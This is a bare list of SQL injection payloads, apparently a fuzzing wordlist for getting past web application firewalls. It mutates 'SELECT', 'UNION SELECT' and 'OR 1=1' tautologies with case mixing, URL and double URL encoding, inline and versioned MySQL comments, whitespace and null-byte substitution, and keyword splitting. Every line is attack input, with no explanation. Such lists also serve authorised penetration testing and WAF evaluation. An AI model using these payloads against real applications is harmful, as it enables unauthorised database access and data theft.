/*!50000SELECT*/ 1
sElEcT 1
SeLeCt 1
%53%45%4c%45%43%54 1
%2553%2545%254c%2545%2543%2554 1
SELECT%0b1
SELECT%0c1
SELECT%0d1
SELECT%a01
SELECT/**/1
SELECT/*!*/1
SELECT/*!50000*/1
SE/**/LECT 1
SEL/**/ECT 1
SELE/**/CT 1
SELEC/**/T 1
S/**/E/**/L/**/E/**/C/**/T 1
SELECT%00 1
1'%20oR%20'1'%3D'1
1'%20OR%20'1'%3D'1
1'%20Or%20'1'%3D'1
1'/**/OR/**/1=1-- -
1'%0bOR%0b1=1-- -
1'+OR+1=1-- -
1'\x0aOR\x0a1=1-- -
1' /*!50000OR*/ 1=1-- -
1' /*!OR*/ 1=1-- -
UNION%23%0ASELECT
UNION%23random%0ASELECT
UNION%23%0A%23%0ASELECT
UN%49ON SEL%45CT
%55NION %53ELECT
UniOn SeLeCt
uNiOn sElEcT
UNI%4fN SEL%45CT
%00UNION%00SELECT
1'||'1'='1
1'&&'1'='1
1' UNION ALL SELECT NULL-- -
1'+UNION+ALL+SELECT+NULL-- -
1'%09UNION%09ALL%09SELECT%09NULL-- -
1'%0AUNION%0AALL%0ASELECT%0ANULL-- -
1'%0DUNION%0DALL%0DSELECT%0DNULL-- -
1' UNI/**/ON SEL/**/ECT NULL-- -
1' /*!UNION*/ /*!SELECT*/ NULL-- -
